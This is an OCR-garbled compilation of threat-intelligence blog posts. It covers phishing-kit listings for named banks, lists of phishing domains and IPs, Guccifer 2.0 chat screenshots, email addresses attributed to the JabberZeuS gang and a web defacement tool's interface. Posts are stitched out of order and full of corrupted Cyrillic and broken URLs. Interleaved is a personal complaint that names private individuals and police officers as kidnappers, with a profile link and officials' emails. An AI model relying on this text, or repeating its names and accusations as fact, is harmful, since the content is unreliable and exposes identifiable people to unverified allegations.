03/23/2008 04:04 AM 
by Pedrobear BJ 


03/23/2008 04:04 AM 
by Pedrobear BJ 


03/23/2008 04:03 AM 
by Pedrobear BJ 


03/23/2008 04:03 AM 
by Pedrobear BY 


03/23/2008 04:02 AM 
by Pedrobear >| 


03/23/2008 04:02 AM 
by Pedrobear BJ 


03/23/2008 04:01 AM 
by Pedrobear BJ 


03/23/2008 04:01 AM 
by Pedrobear By 


03/23/2008 04:00 AM 
by Pedrobear BJ 


[10] 
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[11] 
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[13] 
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[14] 
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Stay tuned! 
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https://1.bp.blogspot .com/-CMsTycRdI9E/YDIKNR1-UyI/AAAAAAAAL40/g5qqg1-SBHARh4um0-7ST52650str43BQCLcBGAs 


12. 

13, 
HQ/s2048/Misc_10. jpg 

14. 
15. 
16. 
17, 
18 


HQ/s960/Misc_15.jpg 


17.2.13 Historical OSINT - Exposing Bulgaria circa 2008-2013 - An OSINT Analysis 
(2021-02-25 03:37) 


Missing Durzhavna Sigurnost? Worry about your IP (Intellectual Property) as if it was U.S Na- 
tional Security? Did the Klingons did it? Keep reading. 


asen.kKumanov@dans.bg 


milko.milenov@dans.bg 


miroslav.tsvetkov@dans.bg 


tsvetan.kitov@dans.bg 
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Now that’s a weird example of a [1]successful targeted attack abusing epileptics’ photo 
sensitivity. [2]Hackers post seizure causing flashing images at an Epileptics forum : 


"Internet griefers descended on an epilepsy support message board last weekend and 
used JavaScript code and flashing computer animation to trigger migraine headaches and 
seizures in some users. The nonprofit Epilepsy Foundation, which runs the forum, briefly 
closed the site Sunday to purge the offending messages and to boost security. The incident, 
possibly the first computer attack to inflict physical harm on the victims, began Saturday, 
March 22, when attackers used a script to post hundreds of messages embedded with flashing 
animated gifs." 


Mentioning the attack would mean nothing if I’m not to provide screenshots of the fo- 
rum postings courtesy of user Pedrobear, and the actual seizure image used, which in the 
case of this attack was pics.ohlawd.net/img/seizure.gif. And if you think seizure.gif is mean, 
[3]optical illusions such as this one can cause the same effects to everyone if you’re to stare 
at it for more than five seconds. 


1. http://it.slashdot.org/article.pl?no_d2=1&%sid=08/03/29/206207 
2. http: //www.wired.com/politics/security/news/2008/03/epilepsy 
3. http://www.ukpuzzle.com/puzzles/014. jpg 


4.3.19 Phishing Pages for Every Bank are a Commodity (2008-03-31 09:43) 


Abbey.Co.Uk Download Now 
BankofAmerica.Com ( Full InFo ) Download Now True Login, 
BankofAmerica.Com ( Full InFo ) Download Now 

Cahoot.Co.UK Download Now 

Chase.Com Download Now 
E-Gold.Com Download Now 
eBay.Com Download Now True Login, 
HSBC.Co.Uk Download Now True Login, 
HSBC.Co.Uk (+CC Info) Download Now True Login, 
LloydsTSB.Com Download Now True Login, 
MoneyBookers.Com Download Now 
Nationwide.Co.Uk Download Now 

NBK.Com.Kwr Download Now 

PayPal.Com Download Now True Login, 

Regions.Com Download Now 


Regions.Com (+Questions) Download Now 


Stgeorge.Com.Au ( Australie ) Download Now 


Wachovia.Com Download Now 
Westernunion.Com Download Now 


Westernunion.Com Download Now True Login, 


A new phishing scam is currently in the wild, emails pretending to be from Bank of ****** 
were detected by *****, anti soam vendors are indicating a tremendous increase in phishing 
emails during the last quarter - phishing headlines as usual, isn’t it? Phishing is logically 
supposed to increase, the convergence of phishing and bankers malware is already happening, 
segmentation of the emails database is only starting to take place, and it’s not that a perticular 
brand is targeted more efficiently than other - they’re all getting targeted. In 2008, phishing 
pages for each and every bank are a commodity, anyone can download them, modify them to 
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17.2.14 Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Repub- 
lic of Bulgaria - Part Two (2021-02-28 08:02) 


ENMHKPHSA 


antes, na 27 roznnE 


Tlonox 3a macroamata xocnmTaamsanua: [locranna 20 npbe ier 
NCHXHATPHMCH CTaWHOHAap HM RO HACTORUIIA MOMCHT He ¢€ nToOA3RA 
(CHCLIMAAHSHPAHA McHxHaTpHina gomout, Jlopegey.c Ipegwera Ha. PY 1 
MEBR.n Dpont. He RO Ubiae IIE ee eee 
rornatleesmunm oT POLITSsS NPOMANSIA.B ToOnencHHeTO AATHpa o 
MONRO: HA MECC JOAN, KOLATO, GaMHEGA a wHRCC CaM Ha KBapTipa 
Cosbaszodipes arepsa smeceu noampkaa exennennta ephaka c Tax Ik 
c SHO; CAC TOBA ciipas nace obama. Ha nosphnsBanHsa OT TAXH: 
HCTPMMA HCL OFTOBBPAA HAH H3KAIOUBAaA TeactboruTe cu. Topa rH MpHreciitao 1 
Te SANOYWHAAM Ja TO HAGtpRaT axTHBHO. Tloayavai MHCMO OT Xa3aHHa, Ye ZK 
15.09.10r. tpx6za na ocnoGoaxt KBapTupatTa, a TAKA CbUkO HM HAKOAK: 
QGAAAHEA $A HETIAATCHH AMIHMTOBH BHOCKH 3a 3aKYNeH OT CHNA MM Aartron 
Ha nocotenara ava Te OTHIAN Cocbitst, KMICTO HAaMepHas CHa CH Qa cn 
8 kuapriipata. Orkasnas 2a ropopH ¢ Tax, Gita rpy6 u XAaUICH. Cr6paan x 

& S0o7a ce BLpHaT » Tpoan, ToH mt ocrapua npex KBapTHpata no; 
MPCMAor, He ¢ BACT Hf JAMHHAA HAKERE c TaKcH, Cacd saBphutanero 8 Tposi 
OTKAIGAA TA KOHTAKTYBA C POJUITCANTe HC Apyrit nosHaTH. SarBapRa ce Mm 
{GHA B CTASTA CH, OTKAIBAA MA Ce XPath wacwHO c Tax. Hanyckaa Aoma cn 6c 
ZA fawa oGACHCHHA Kone XOMM H Kora ue ce BEpHe. Mpomanara 1 
SRORCRCUNCTO , ay GMAA)sKONCTATHpaHa HM oT chcen H NpHATCAH Hi 
Cemeliporo, Koro. Jlanso, MOMMHHaBAaA KATO Halrbailto wenosvarH. Tips 
oTnpanenn sa6eacKKH oF crpana wa MajikaTa ,3aouBaa fa sraesa AouIo” 
HancakEe Xone, C MpcHOCHMHa KoMMioThp. Tacmaa TeacBH3HA oT oKOM 
MCTLP PAICTOAHHE, SAKNOTHAA H ITO HAKOAKO IThTH MpoNepaABAA BxXOLHAT 
BpaTa Aaa le Gaxaoicna. Herocpeacrseno npeny HaMecaTa Ha NoAMUMsAT: 
ganouwraiyia te PMHOSB>ppaAHO, CMCCRAA CNOMECHH OT METCTBOTO ¢ HaCKOp 
caput CenieuEy gROTpeSABAA MHOTO KOMMOTDpHit TEPMITI MO CTeen 
ne 5 pagMocr. 


Dear blog readers, 


This is a quick note on my current situation in my home town in Troyan Bulgaria where | was 
originally kidnapped and home molested by three police offers from the local police department 
who stole my ID from my place and with no witnesses escorted my and locked me in a room in 
another town for a period of several months and injected me on a daily basis without anyone’s 
knowledge and with no legal action and legal consequences from anyone including anyone 
from Republic of Bulgaria. 


Bulgarian name of people involved in my kidnapping and illegal arrest including robbery 5 
years later that used to act as local police inspectors in Troyan Police, Bulgaria circa 2010: 
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¢ MapuvH Moes Mapukos 


¢ MaBauH CTOAHOB [eoprueB 


¢ Kpacumup Muxos Kones 


¢ Tuxomup HavgeHos CnaBKos\ 


¢ CTreqdaH UBaHos Munes 


¢ AHaTosu MnamMeHoB TpudoHosB 


¢ CTraHumup Lloyes UHKoBcKu 


¢ ABaH Hegsnkos UBaHoB 


¢ Mupocnas CTonkos Muxannos 


¢ Bacun Moes TayescKku 


¢ Bowkugap BaHkos I[letpos 


¢ Becko LIBeTaHoB MUHKOB 


¢ Momunun CredaHos Lloves 


¢ MUHKO CTOAHOB MUHKOB 


¢ Teopru MutKos Usues 


Sample personal photo of my personal kidnapper circa 2010 from my place in Troyan, Bulgaria 
- Mapann Crosnos Feoprues (https://www.facebook.com/profile.php?id=100005932519460): 
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Primary points of contacts in case someone is worried about well-being and whereabouts in 


this case should be: 

Email: dans@dans.bg 

Telefon za korupcig na Slujiteli na MVR - 02 / 982 22 22 
GDBOP - Signal za korupciq i izpirane na pari - gdbop@mvr.bg 
Nachalnik RPU Troyan - rutr.lo@mvr.bg 

Troyan Police - Email: police _troyan@abv.bg 

Troyan Hospital - Email: mbal troyan@abv.bg 

Lovech Psychiatry Clinic - Email: dpblovech@abv.bg 

Troyan Municipality - Email: mail@troyan.bg 
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Related reading: 

[1]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
[2]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria? 
[3]Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two 


1. https://ddanchev.blogspot.com/2019/11/dancho-danchevs-disappearance-2010.htm 
2. https: //ddanchev. blogspot .com/2020/12/how- i-got-robbed-and-beaten-and.htm 
3. https: //ddanchev. blogspot .com/2019/04/dancho-danchevs-2010-disappearance. htm 


17.2.15 Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle George" - 
An Update (2021-02-28 18:34) 


[1] 


DARKCOMET NACI one 


TENE®OHOB 3BOHKOB - 
TENErPAMM AHOHUMHOCTb KNUEHTOB - AMAZON 


cx MATASMHE TENETPAM 
OEVIK Jt DUMPS NPODAOKA PRICE xynnio 
wzm-criam CLIOMNEP ORIGINICQ MAPCEP 
ves U TVUUTER CIIAMEPBINAPONEN ower 
TOBAPOB AMEXOJIYDEPDI ceppera 


BITCOIN onyoun KA DDOS WORDPRESS 
Nor CKPUNTUHE YOUTUBE WEBMONEY 


TAPAHT Yu3BVMOCTb = TAPAHTA 
PACCBINKA nv" CLOUDFLARE DOKYMEHT! 


Dear blog readers, 


| wanted to take the time and effort and elaborate more on some of the current activities 
behind my currently ongoing [2]Law Enforcement and OSINT Operation "Uncle George" where 
I’ve managed to process and actively crawl approximately 1M of publicly accessible cybercrime 
forum community web sites for the purpose of enriching and actually distributing the Data Set 
to interested parties with the idea to assist U.S Law Enforcement and the U.S Intelligence 
Community on its way to properly respond to track down and prosecute the cybercriminals 
behind these campaigns. 


The current state of Law Enforcement and OSINT Operation "Uncle George" is that I’ve been 
approached by several vendors including independent researchers who expressed interest in 
obtaining access to the Data Set for the purpose of data mining and enriching it. 

I’ve also decided to share some recently produced graphs which basically represent a decent 
portion of popular keywords and topics that cybercriminals are busy discussing on the commu- 
nities found in the original Law Enforcement and OSINT operation "Uncle George" cybercrime 
forum Data Set. 
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have the stolen data forwarded to a third-party, backdoor them to have phishers scamming 
the phishers, facts that are shifting the emphasis on the segmentation, malicious economies 
of scale concept, the spamming process of phishing emails, and of course, the arms race be- 
tween the targeted brands and the phishers in terms of catching up with each other’s activities. 


In the very same way, malware authors apply Quality and Assurance practices to their 
malware releases by sandboxing, making sure they have a low detection rate by scanning 
them with all the anti virus scanners available, as well as ensuring they’ll [1]phone back 
home through bypassing the most popular firewalls, phishers tend to put a lot of efforts into 
coming up with the very latest fake phishing pages of each and every brand or financial 
institution. What you see in the attached screenshot is a detailed description of the exact type 
of information the phishing page is capable of collecting, and when it was last updated. And 
while the question to some has to do with the number of people getting tricked by phishing 
emails, coming across such regularly updated repositories makes me think how many people 
are getting tricked by outdated phishing pages. 


The logical questions follows - why would a phisher simply release the very latest phish- 
ing pages for a multitude of brands to be targeted in the wild for free, [2]next to keeping them 
private for his very own private phishing purposes? Take web malware exploitation kits for 
instance, and the moment when once they turned into a commodity, they started getting used 
as a bargain in many other deals. In the phishing pages case, once the "product" is offered 
for free, the "service" in this case [3]the possible segmentation and spamming as a process 
comes with a price tag. 


And while someone’s currently using these freely available phishing pages, others are 
selling them to those unaware that they’re actually a commodity and come free, and some- 
one else is using them in a bargain deal offering them as a bonus for purchasing another 
underground good or service to an uninformed bargain hunter again not knowing that what’s 
offered as bonus is actually available for free - the [4]dynamics of the underground economy 
in full scale. 


Related posts: 

[5]RBN’s Phishing Activities 

[6]Inside a Botnet’s Phishing Activities 

[7]Large Scale MySpace Phishing Attack 

[8]Update on the MySpace Phishing Campaign 
[9]MySpace Phishers Now Targeting Facebook 
[10]DIY Phishing Kits 

[11]DIY Phishing Kit Goes 2.0 

[12]PayPal and Ebay Phishing Domains 

[13]Average Online Time for Phishing Sites 

[14]The Phishing Ecosystem 

[15]Assessing a Rock Phish Campaign 

[16]Taking Down Phishing Sites - A Business Model? 
[17]Take this Malicious Site Down - Processing Order.. 
[18]209 Host Locked 

[19]209.1 Host Locked 

[20]66.1 Host Locked 

[21]Confirm Your Gullibility 

[22]Phishers, Soammers and Malware Authors Clearly Consolidating 
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[9] 


[10] 
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lexisnexis.com. ezproxy. ir 
link.springer. com.ezproxy.ir 
ieeexplore.ieee.org. ezproxy.1 ir 
link.springer. con ae: ir 
sciencemag.org. ezproxy.i 


spiedigitallibrary.org. — it 
journals.cambridge.org. ezproxy. ir 
jstor.org. -ir 

oxfordjournals.org. eZproxy. ir 
booksandjournals.brillonline.com. ezproxy. i a 
incites.thomsonreuters.com. ezproxy. A 
esi.incites.thomsonreuters.com. ezproxy. TE 
www.sciencedirect.com. ezproxy. ch 
bioone.org. ezproxy. ar 
ulrichsweb.serialssolutions.com. eZproxy. ce 
compass.astm.org. eZproxy. Ar 

login.access. eZproxy. ar 

onlineserver-14 . CEZProxy. Ey 


Sample phishing URLs known to have been involved in the campaign: 


ezvpn.mskcc.saea.ga 
library.asu.saea.ga 
library.lehigh.saea.ga 
moodle.ucl.ac.saea.ga 
saea.ga 

unex.learn.saea.ga 
unomaha.on.saea.ga 
www.uvic.saea.ga 
catalog.lib.usm.edu.seae.tk 
elearning.uky.edu.seae.tk 
www.aladin.wrlc.org.seae.tk 
alexandria.rice.ulibr.ga 
cmich.ulibr.ga 
columbia.ulibr.ga 
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edu.edu.libt.cf 
ezproxy-authcate.lib.monash.ulibr.ga 
login.revproxy.brown.edu.edu.|libt.cf 
ezproxy-authcate.monash.lib.ulibr.ga 
ezproxy-f.deakin.au.ulibr.ga 
lib.dundee.ac.uk.ulibr.ga 
cas.usherbrooke.ca.cavc.tk 
catalog.lib.ksu.edu.cavc.tk 
isa.epfl.ch.cavc.tk 
login.vcu.edu.cavc.tk 
www.med.unc.edu.cavc.tk 
cas.iu.edu.cavc.tk 
Ituvpn.latrobe.edu.au.reactivation.in 
passport. pitt.edu.reactivation.in 
edu.login.revproxy.brown.edu.|libt.cf 
shibboleth.nyu.edu.reactivation.in 
login.revproxy.brown.edu.login.revproxy.brown.edu. libt.cf 
weblogin.pennkey.upenn.edu.reactivation.in 
webmail.reactivation.in 
www.ezlibproxy1.ntu.edu.sg.reactivation.in 
www.eZpa.library.ualberta.ca.reactivation.in 
www.lib.just.edu.jo.reactivation.in 
www.passport. pitt.edu.reactivation.in 
shib.ncsu.ulibr.cf/ 
www.shibboleth.nyu.edu.reactivation.in 
www.weblogin.pennkey.upenn.edu.reactivation.in 
ezlibproxy1.ntu.edu.sg.reactivation.in 
login.revproxy.brown.edu.libt.cf 
weblogin.umich.edu.lib2.ml 
catalog.sju.edu.mncr.tk 
ezpa.library.ualberta.ca.reactivation.in 
lib.just.edu.jo.reactivation.in 
login.ezproxy.lib.purdue.edu.reactivation.in 
login.libproxy.temple.shibboleth2.uchicago.ulibr.cf 
shib.ncsu.shibboleth2.uchicago.ulibr.cf 
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shibboleth2.uchicago.shibboleth2.uchicago.ulibr.cf 
singlesignon.gwu.shibboleth2.uchicago.ulibr.cf 
webauth.ox.ac.uk.shibboleth2.uchicago.ulibr.cf 
edu. libt.cf 

login.libproxy.temple.ulibr.cf 
shib.ncsu.ulibr.cf 

singlesignon.gwu.ulibr.cf 
webauth.ox.ac.uk.ulibr.cf 
library.cornell.ulibr.ga 
login.ezproxy.gsu.ulibr.ga 
shibboleth2.uchicago.ulibr.cf 
login.library.nyu.ulibr.ga 

mail.ulibr.ga 

webcat.lib.unc.ulibr.ga 

www.ulibr.ga 

www.alexandria.rice.ulibrga 
www.cmich.ulibr.ga 

www.columbia.ulipr.ga 
www.ezproxy-authcate.lib.monash.ulibr.ga 
www.ezproxy-authcate.monash.lib.ulibr.ga 
www.ezproxy-f.deakin.au.ulibr.ga 
www.lio.dundee.ac.uk.ulibrga 
www.library.cornell.ulibr.ga 
www.login.ezproxy.gsu.ulibr.ga 
www.login.library.nyu.ulibr.ga 
auth.berkeley.edu.libna.ml 
sso.lib.uts.edu.au.libna.ml 
bb.uvm.edu.cvre.tk 
cline.lib.nau.edu.cvre.tk 
illiad.lib.binghamton.edu.cvre.tk 
libcat.smu.edu.cvre.tk 
login.brandeis.edu.cvre.tk 

msim.cvre.tk 

libcat.library.qut.nsae.ml 


www.webcat.lib.unc.ulibr.ga 
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Sample domains known to have been involved in the campaign: 
mlibo.ml 
blibo.ga 
azll.cf 
azlll.cf 
Iz\l.cf 
jlll.cf 
elll.cf 
lib. cf 
tsll.cf 
ulll.tk 
till.cf 
libt.ga 
libk.ga 
libf.ga 
libe.ga 
liba.gq 
libver.ml 
ntll.tk 
ills.cf 
vtll.cf 
clll.tk 
stll.tk 
llii.xyz 
lill.pro 
eduv.icu 
univ.red 
unir.cf 
unir.gq 
unisv.xyz 
unir.ml 
unin.icu 
unie.ml 
unip.gq 
unie.ga 
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unip.cf 
nimc.ga 
nimc.ml 
savantaz.cf 
unie.gq 
unip.ga 
unip.ml 
unir.ga 
untc.me 
jhbn.me 
unts.me 
uncr.me 
lib-service.com 
unvc.me 
untf.me 
nimc.cf 
anvc.me 
ebookfafa.com 
nicn.gq 
untc.ir 
librarylog.in 
Illi.nl 

IIIf.n| 

libg.tk 
ttil.nl 

Ilil.nl 

lliv.nl 
llit.site 
flil.cf 
e-library.me 
cill.ml 

fill. cf 
libm.ga 
eill.cf 

llib.cf 
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eill.ga 
nuec.cf 
illl.cf 
cnen.cf 
aill.nl 
eill nl 
mlib.cf 
ulll cf 
nlll.cf 
clll.nl 
lii.cf 
etll.cf 
ledu.in 
aill.cf 
atna.cf 
atti.cf 
aztt.tk 
cave.gq 
ccli.cf 
cnma.cf 
cntt.cf 
crll.tk 
csll.cf 
ctll.tk 
cvnc.ga 
cvve.cf 
czll.tk 
cztt.tk 
euca.cf 
euce.in 
ezll.tk 
ezplog.in 
ezproxy.tk 
eztt.tk 
fll. cf 
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iell.tk 
iull.tk 
izll.tk 
lett.cf 
lib1.bid 
lib1.pw 
libb.ga 
libe.ml 
libg.cf 
libg.ga 
libg.gq 
libloan.xyz 
libnicinfo.xyz 
libraryme.ir 
libt.ml 
libu.gq 
lill.gq 
IIbt.tk 
llib.ga 
llic.cf 
llic.tk 
llil.cf 
llit.cf 
lliv.tk 
llse.cf 
ncll.tk 
ncnc.cf 
nctt.tk 
necr.ga 
nika.ga 
nsae.ml 
nuec.ml 
rill.cf 
rnva.cf 
rtll.tk 
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sctt.cf 
shibboleth.link 
sitl.tk 

slli.cf 

till.cf 

titt.cf 

uill.cf 
uitt.tk 
ulibe.ml 
ulibr.ga 
umlib.ml 
umll.tk 
uni-lb.com 
unll.tk 
utll.tk 
vsre.cf 
web2lib.info 
xill.tk 
zedviros.ir 


Zill.cf 


Sample IPs known to have been involved in the campaign: 


103.241.3.91 
104.152.168.23 
107.180.57.7 
107.180.58.47 
138.201.17.56 
144.217.120.73 
144.76.189.80 
162.218.237.3 
167.114.103.215 
173.254.239.2 
176.31.33.115 
178.33.115.10 
184.95.37.90 
185.105.185.22 
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185.28.21.83 
185.55.227.104 
185.86.180.250 
188.40.34.186 
193.70.117.250 
195.154.102.75 
198.252.106.149 
198.91.81.5 
199.204.187.164 
31.220.20.111 
66.70.197.208 
78.46.77.105 
79.175.181.11 
82.102.15.215 
87.98.249.207 
88.99.139.8 
88.99.160.209 
88.99.40.240 
88.99.69.4 
93.174.95.64 
94.76.204.201 
136.243.145.233 
136.243.198.45 
141.8.224.221 
148.251.116.93 
148.251.12.172 
162.218.237.31 
167.114.13.164 
172.246.144.34 
173.254.239.217 
6.31.33.115 
176.31.33.116 
176.9.188.235 
85.28.21.83 
185.28.21.95 
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[23]The Economics of Phishing 


_feep://Adanchev blogspot .con/2007/10/multiple-firevalls-bypassing. tall 
_http://adanchey blogspot .con/2007/10/dynamics~of-nalvare~ industry tn 

_hetp://adanchov blogspot. con/2007/10/nanaged- spanning” appliances-future-of ital 
| http://adanchey blogspot .con/2007/08/ander groud-econonys-supply-of-goods heal 


ttp://ddanchev.blogspot.com/2008/02/rbns-phishing- activities .htm 


ttp://ddanchev.blogspot.com/2008/02/inside-botnets-phishing-activities.htm 


ttp://ddanchev. blogspot .com/2007/11/large-scale-myspace-phishing-attack.htm 


. http: //ddanchev.blogspot .com/2007/12/update-on-myspace-phishing- campaign. htm 


ttp://ddanchev.blogspot.com/2008/01/myspace-phishers-now-targeting- facebook. htm 
10. http://ddanchev. blogspot .com/2007/08/diy-phishing-kits.htm 


ttp://ddanchev. blogspot .com/2007/09/diy-phishing-kit-goes-20.htm 


12. 

. http://ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 
14 
15. 


ttp://ddanchev. blogspot .com/2007/04/taking-down-phishing-sites-business .htm 
ttp://ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 


18, hetp://adanchev blogspot .com/2007/09/209-host-Locked. neal 
| http://adanchev.blogepot con/2007/12/2001-host- locked. he] 

_netp:/ /ddanchev. blogspot .con/2007/14/66i-host locked. htal 

21, http; //ddanchev. blogspot .con/2007/07/confirm-your~gul ibility. béal 
_hetp:/ /ddanchev. blogspot .con/2007/12/phishers-spanners-and-nalware-authors_htal 
_hetp:/ /ddanchev. blogspot .con/2007/08/sconoaics-of-phishing. neal 
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192.169.82.134 
198.27.68.142 
198.91.81.51 
45.35.33.126 
46.4.91.26 
3.135:.123.163 
5.196.194.234 
51.254.198.131 
51.254.21.142 
79.175.181.118 
88.99.128.229 
88.99.139.88 
88.99.69.49 
3.174.95.64 


Stay tuned! 


1. 
2. 

3. https://archive.org/details/dancho-danchev-analysis-report-iran-hacking-scene 

4. 

5. 
6. 
7. 
8. 
9. 
10. 


17.3.2 Exposing the Guccifer 2.0 "GRU-Connected" Enterprise - An OSINT Analysis 
(2021-03-03 13:06) 


[1] 
13883 


i OC Leaks | 


€ > C © deleaks.com 


PORTFOLIO DC Agour CONTACT 


LATEST UPDATES PORTFOLIO 


Gcinsics com/index Shp/porttolio page/ninetart) 


Dear blog readers, 


| wanted to take the time and effort and elaborate more on the so called Guccifer 2.0 enter- 
prise which basically represent a single lone hacker who basically made a high-profile Web site 
compromise and actually launched a social media account behind it for the purpose of com- 
municating the purpose of attacking and actually making the information publicly accessible 
online for free. 


In this post I’ll provide actionable intelligence on the Guccifer 2.0 enterprise which basically 
represent a single lone hacker that actually distributed a high-profile data leak and build a 
social media account behind it. 


Sample Personal URLs: https://guccifer2.wordpress.com; https://twitter.com/GUCCIFER _2 
Sample personal email: Guccifer20@aol.fr 


Sample IPs known to have been involved in the campaign: 95.13.15.34; 95.130.9.198; 
212.117.164.35; 95.211.168.139 


Sample VPN service provider which was used by the Guccifer 2.0 enterprise: 
hxxp://nsl.vpn-service.us - 176.9.89.229 - Email: sec.service@mail.ru 
hxxp://ns2.vpn-service.us - 85.17.139.9 
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hxxp://ns3.vpn-service.us - 212.117.164.35 
hxxp://nsl.vpn-service.us - 212.32.234.134 
hxxp://ns2.vpn-service.us - 37.48.92.139 

hxxp://ns3.vpn-service.us - 193.161.87.105 


Sample screenshots of conversation with the Guccifer 2.0 enterprise: 


[2] 


& i don't vote for trump 


18 Oct 2016 


Well if you're Russian (or Romanian or 


whatever) you can't vote for anybody, 


right? i 


18 Oct 2016 


i vote for freedom 


& follow me and make a good story 
18 Oct 2016 


[3] 
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GUCCIFER 2.0 
@GUCCIFER_2 


; but if you really want to destroy a poll 
you hack their twitter and post a dick pic or Some racist rant then take a 


screenshot and delete iH 5 mi S laler. Nobody will believe them when 


they claim they're hacked and the political career is over. HAHA 


7 Sep 2016 ¥ 


ura funny guy :) 


3 it will be interesting even just for lulz :) 
7 Sep 2016 


7 Sep 2016 


Yep | used to love thts stufl. About a decade ago | tied to buikd a 


Bluetooth sniper rifle” where you turn on the mic on a cell behind a door 


using the Bluetooth. | walked around the Capitol but It didn'l really work 


7 Sep 2016 ¥ 


Holy fuck man I don't think you realiz ou Oo me. I'm stil going 
thw gh that stuff an find bune ep the turnout model for the 
Gemocrats entire presidential campaign hus ts probably worth millions of 
Gollars. fm going to post if tomorrow 

Oh man. I'm not sure they even CAN redo this because i's based on math 


and population patierns since the election... Haha 


7 Sep 2016 ¥ 


have 81 cents in Biatcoin. | think that might be close to a milion Canadian 


dollars. Haha 


PR een mer 


oa & 


[4] 


Hi - we're running a story on the BBC 
World Service this weekend which 
touches on your recent release of 


alleged Clinton Foundation 


documents. Would you be available to 
comment? - 


6 Oct 2016 


hi 


& u can send me ur questions here 


6 Oct 2016 


[5] 
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What do you think about Putin? - 


18 Oct 2016 


i don't live in russia. i'm not interested in 
russia and its government. 


Not even a little bit? 


But you don't live in the USA either - and 
you are very interested in American 
politics 


18 Oct 2016 


| mean, I'm interested in Russia (and the 
UK and the US too) 


18 Oct 2016 


i'm little bit angry with that. all of u 
attribute me to russia, but i'm tired of it. i 
& don't care about that country. 


18 Oct 2016 


[6] 
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GUCCIFER 2.0 
@GUCCIFER_2 @ xX 


Hey! I'm a reporter at VICE Motherboard. Can we 
chat? 


ts 


21 Jun 2016 ¥ 


Yes, we can try here, unless you have 
OTR/Jabber or Skype. € 


21 Jun 2016 ¥ 


So, first of all, what can you tell me about 
yourself? Who are you? 


ok! let's try 
21 Jun 2016 


21 Jun 2016 ¥ 


i'm a hacker, manager, philosopher, women lover. 
| also like Gucci! | bring the light to people. I'm a 
freedom fighter! So u can choose what u like! 


21 Jun 2016 


And where are you from? € 
21 Jun 2016 ¥ 


from Romania 


21 Jun 2016 


[7] 
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Hi - we're running a story on the BBC 
World Service this weekend which 
touches on your recent release of 


alleged Clinton Foundation 
documents. Would you be available to 
comment? 


6 Oct 2016 


hi 


u can send me ur questions here 


6 Oct 2016 


Stay tuned! 


1. https://1.bp.blogspot .com/-Cid9tZvgyFA/YD79UKJiwOI /AAAAAAAAL78/hnaJ4sNx_Xcik4wRbjtRHvx0Kc50 jvyfgCLcBGAsYHQ 


s1999/Misc_01.png 


2. https://1.bp.blogspot .com/-ES5iqNJNE7g8/YD79bBC2APT /AAAAAAAAL8E/sHU- eKvBWj8YY70BSs51hUK 1PznkyH8VQCLcBGASYHQ 


s624/Misc_01.png 


3. bttps://1.bp. blogspot .com/-Sj14£Mq482U/YD79bIRZXTI/AAAAAAAAL8A/ JP3uwo3ZA0cT8ME7y 1y39tXr8eBqvMypwCLcBGAsYHQ 
4. https://1.bp. blogspot .com/-GhelBMWxbn0/YD79bP-uUPI/AAAAAAAAL81/i90_bOK_1WsW4qmKReq8AJKqO8wMhcBkQCLcBGASYHQ 
5. 
6. 
7. https://1.bp.blogspot .com/-UHQirgxGgvw/YD7 9bw7x4EI /AAAAAAAAL8U/voTfxi0nXoEUFVZjo8uAxaYH_ASbtOX1wCLcBGAsYHQ 
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17.3.3 Exposing FBI’s Most Wanted Cybercriminals - "JabberZeuS" Crew - An OSINT 
Analysis (2021-03-03 16:07) 


[1] 


& CP =: Summary statistics 


€ CGO localhost/web/cp.php?m=stats_main 


CP :: Summary statistics 


eaneneeit a! 
Current user: admin Total b 
GMT date: 04.04.2019 otal reports in catabase: 
GMT time: 23:30:07 Tine of first activity: 04.04.2019 23:29: a 
Statistics: Total bots: : 
7 Total active bots in 24 hours: 100.00% - 1 
Lf Minimal version of bot: -2.5.-3 
os Maximal version of bot: 1.2.5.1 
Botnet: 
Bots 
Scripts 
Reports: 
Search in database i 
Search in files 
System: 


Information 
Options 
User 

Users 


Logout 


Dear blog readers, 


Continuing the "[2]Exposing FBI’s Most Wanted Cybercriminals" series I’ve decided to share 
some actionable intelligence on the JabberZeuS crew that used to maintain several large bot- 
nets in the context of utilizing the popular DIY and leaked ubiquitous botnet generating and C 
&C server control malicious software known as ZeuS. 


In this post I’ll provide actionable intelligence on the JabberZeuS gang and actually offer an 
in-depth peek inside their infrastructure with the idea to assist U.S Law Enforcement and the 
U.S Intelligence Community on its way to track down and prosecute the cybercriminals behind 
these campaigns. 


Sample personal emails of the individuals involved in the campaign: 
aqua@incomeet.com - 66.199.248.195 
pop2012s@yandex.ru 
donsft@hotmail.com 
johnny@guru.bearin.donetsk.ua 
t4ank@ua.fm 
airlordl1988@gmail.com 
alexeysafin@yahoo.com 
aqua@incomeet.com 
bashorg@talking.cc 
benny@jabber.cz 
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bind@email.ru 
bx1@hotmail.com 

bx1 _@msn.com 
cruelintention@email.ru 
d.frank@Onl1ine.at 
d.frank@jabber.jp 
danibx1@hotmail.fr 
danieldelcore@hotmail.com 
demon@jabber.ru 
duo@jabber.cn 
fering99@yahoo.com 
firstmenl17@rambler.ru 
getready@safebox.ru 
notifier@gajim.org 
gribodemon@pochta.ru 
h4x0rdz@hotmail.com 
hof@headcounter.org 

i _amhere@hotmail.fr 
jheto2002@gmail.com 
john.mikle@ymail.com 
johnlecun@gmail.com 
kainehabe@hotmail.com 
lostbuffer@gmail.com 
lostbuffer@hotmail.com 
mary.j555@hotmail.com 
miami@jabbluisa.com 
moscow.berlin@yahoo.com 
mricq@incomeet.com 
niko@grad.com 
petrOvich@incomeet.com 
princedelune@hotmail.fr 
sector.exploits@gmail.com 
secustar@mail.ru 
sere.bro@hotmail.com 
shwark.power.andrew@gmail.com 
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4.4 April 


4.4.1 A Commercial Web Site Defacement Tool (2008-04-01 12:13) 


<<. 
& Limited Version (J Oo 
IDF.PHP URL | Address That U Upload PHP File , ONLY Use iT , No Use Another PHP Shell 
PHP File Address : Attp: {www target.com/test/idf. php 


Deface Page Address | Must Be Upload in The Folder That PHP File Uploaded 
Deface Page Name: http: www. target. com/testideface. htm 


Deface Name That above Deface Address Will Be Copy By This Name in Defaced Sites 
Deface Name : def .htm 


List OF Site in Server | Click it and wait List Perm Folder Of Site That U Click It, Click it To Be Defaced 


